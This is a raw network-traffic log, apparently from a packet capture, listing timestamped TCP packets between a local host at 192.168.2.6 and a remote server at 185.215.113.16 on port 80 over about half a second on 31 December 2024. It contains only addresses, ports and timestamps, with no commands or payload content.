                                                                                                              Dec 31, 2024 09:48:40.602644920 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.602678061 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.602726936 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.722510099 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.722523928 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.722578049 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.722729921 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.722740889 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.722752094 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.722762108 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.722767115 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.722798109 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.722937107 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.722984076 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.722995996 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.723016024 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.723016977 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.723026037 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.723042965 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.723160982 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.723170996 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.723181009 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.723192930 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.723201990 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.723207951 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.723212004 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.723222017 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.723236084 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.723588943 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.723598957 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.723608971 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.723622084 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.723648071 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.723792076 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.723803043 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.723813057 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.723833084 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.723860979 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.723871946 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.723881006 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.723891020 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.723895073 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.723918915 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.724353075 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.724363089 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.724374056 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.724385977 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.724407911 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.724407911 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.724419117 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.724428892 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.724438906 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.724453926 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.724481106 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.724490881 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.724499941 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.724510908 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.724519014 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.724531889 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.724556923 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.725253105 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.725264072 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.725275993 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.725281000 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.725286007 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.725291014 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.725296974 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.725301981 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.725306988 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.725311995 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.725435972 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.727392912 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.771711111 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.847801924 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.847815990 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.847826004 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.847865105 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.848047972 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.848058939 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.848069906 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.848095894 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.848098993 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.848109961 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.848115921 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.848119974 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.848131895 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.848140955 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.848166943 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.848191023 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.848239899 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.848249912 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.848259926 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.848299980 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.848300934 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.848465919 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.848476887 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.848486900 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.848510027 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.896692991 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.974817991 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.974833965 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.974884033 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.974921942 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.974932909 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.974942923 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.974960089 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.974988937 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.974999905 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.975009918 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.975022078 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.975047112 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.975065947 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.975075960 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.975114107 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.975186110 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.975195885 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.975205898 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.975217104 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.975229025 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.975244999 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.975384951 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.975450039 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.975460052 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.975470066 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.975491047 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.975521088 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.975521088 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.975531101 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.975541115 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.975553036 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.975564957 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.975585938 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.975626945 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.975832939 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.975842953 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.975852966 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.975871086 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.975879908 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.975889921 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.975894928 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.975899935 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.975904942 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.975925922 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.975969076 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.975984097 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.975994110 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.976003885 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.976016045 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.976027012 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.976043940 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.976406097 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.976489067 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.976497889 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.976509094 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.976519108 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.976522923 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.976528883 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.976537943 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.976569891 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.976576090 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.976586103 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.976596117 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.976605892 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.976634979 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.976679087 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.976690054 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.976700068 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.976710081 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.976720095 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.976728916 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.976733923 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.976739883 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.976759911 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.977387905 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.977397919 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.977407932 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.977438927 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.977458954 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.977463007 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.977469921 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.977480888 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.977503061 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.977530003 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.977540016 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.977550030 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.977560043 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.977567911 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.977602959 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.977643967 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.977654934 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.977663994 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.977674007 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.977684021 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.977684975 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.977694035 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.977701902 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.977705956 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.977718115 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.977735996 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.978343964 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.978353977 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.978364944 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.978375912 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.978391886 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.978406906 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.978410959 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.978418112 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.978455067 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.978471994 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.978482008 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.978492022 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.978502035 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.978522062 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.978549004 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.978591919 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.978600979 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.978610992 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.978621006 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.978631020 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.978641033 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.978645086 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.978652954 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.978677034 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.979307890 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.979326010 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.979336023 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.979341984 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:40.979345083 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:40.979357004 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:41.021687031 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:41.071616888 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.071633101 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.071645021 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.071667910 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.071680069 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.071682930 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:41.071690083 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.071702003 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.071722031 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:41.071753025 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:41.071772099 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.071782112 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.071793079 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.071800947 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:41.071801901 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.071813107 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.071822882 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.071831942 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:41.071834087 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.071858883 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:41.071907997 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.071918011 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.071928024 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.071938038 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.071948051 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.071958065 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.071968079 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:41.071975946 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.071985960 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:41.071986914 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.071999073 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:41.072026014 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:41.072042942 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.072052956 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.072062969 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.072072983 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.072082996 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.072089911 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:41.072098017 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.072108984 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.072113991 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:41.072118998 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.072129965 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.072130919 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:41.072161913 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:41.072325945 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.072335005 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.072345972 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.072355986 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.072356939 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:41.072365999 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.072374105 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:41.072376013 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.072386026 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.072396040 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.072401047 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:41.072402000 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.072407007 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.072421074 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.072422981 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:41.072446108 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:41.072457075 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:41.072468042 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.072479010 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.072489023 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.072499037 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.072508097 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.072518110 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.072519064 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:41.072529078 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.072540045 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.072547913 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:41.072550058 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.072560072 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.072570086 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.072571993 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:41.072580099 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.072587013 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:41.072588921 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.072598934 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.072608948 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.072619915 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:41.072645903 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:41.098201036 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.098213911 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.098229885 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.098239899 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.098249912 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:41.098259926 CET8049754185.215.113.16192.168.2.6
